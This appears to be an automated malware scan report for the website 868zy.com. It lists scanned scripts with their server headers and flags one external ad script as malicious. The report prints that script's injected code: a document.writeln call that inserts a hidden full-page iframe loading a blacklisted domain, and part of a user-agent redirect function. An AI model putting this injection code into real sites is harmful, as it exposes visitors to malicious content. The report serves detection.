Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=868zy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.868zy.com/ | 200 OK Content-Length: 22433 Content-Type: text/html | clean |
http://www.868zy.com/include/dedeajax2.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:29 GMT Accept-Ranges: bytes ETag: "037ace6c637cc1:22186" Server: IIS Content-Length: 7961 Content-Location: http://www.868zy.com/include/dedeajax2.js Content-Type: application/x-javascript Last-Modified: Fri, 01 Jul 2011 08:14:30 GMT | clean |
http://www.868zy.com/test404page.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://www.868zy.com/images/js/j.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:31 GMT Accept-Ranges: bytes ETag: "0b018e3c637cc1:22186" Server: IIS Content-Length: 31018 Content-Location: http://www.868zy.com/images/js/j.js Content-Type: application/x-javascript Last-Modified: Fri, 01 Jul 2011 08:14:24 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://www.868zy.com/templets/default/js/pic_scroll.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:37 GMT Accept-Ranges: bytes ETag: "0802bf6c637cc1:22186" Server: IIS Content-Length: 3854 Content-Location: http://www.868zy.com/templets/default/js/pic_scroll.js Content-Type: application/x-javascript Last-Modified: Fri, 01 Jul 2011 08:14:56 GMT | clean |
http://aaa.11paap.com/ads.js | 200 OK Content-Length: 1119 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.67u67.com document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='1450' allowTransparency src=http://www.67u67.com/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[533 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='1450' allowTransparency src=http://www.67u67.com/></iframe> Malicious iFrame found. size: 100x1450 src: http://www.67u67.com/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='1450' allowtransparency src=http://www.67u67.com/> | ||
http://www.868zy.com/data/vote/vote_1.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
http://www.868zy.com/data/vote/ | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:42 GMT Accept-Ranges: bytes ETag: "78c1cea2dae9cf1:22186" Server: IIS Content-Length: 3 Content-Location: http://www.868zy.com/data/vote/index.html Content-Type: text/html Last-Modified: Fri, 17 Oct 2014 07:19:06 GMT Set-Cookie: safedog-flow-item=F799C62278EC22BB0FD942E3322028A2; expires=Dec, 11-Arp-2151 07:16:58 GMT; domain=868zy.com; path=/ | clean |
http://www.868zy.com/data/vote/index.html | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:43 GMT Accept-Ranges: bytes ETag: "78c1cea2dae9cf1:22186" Server: IIS Content-Length: 3 Content-Location: http://www.868zy.com/data/vote/index.html Content-Type: text/html Last-Modified: Fri, 17 Oct 2014 07:19:06 GMT Set-Cookie: safedog-flow-item=F799C62278EC22BB0FD942E3322028A2; expires=Dec, 11-Arp-2151 07:16:59 GMT; domain=868zy.com; path=/ | clean |
http://www.868zy.com/tj.js | HTTP/1.1 200 OK Date: Thu, 05 Mar 2015 04:05:47 GMT Accept-Ranges: bytes ETag: "8a61deb97512cf1:22186" Server: IIS Content-Length: 122 Content-Location: http://www.868zy.com/tj.js Content-Type: application/x-javascript Last-Modified: Thu, 16 Jan 2014 04:45:05 GMT | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 868zy.com
Result:
GET / HTTP/1.1
Host: 868zy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 868zy.com
Referer: http://www.google.com/search?q=868zy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 868zy.com
Referer: http://www.google.com/search?q=868zy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.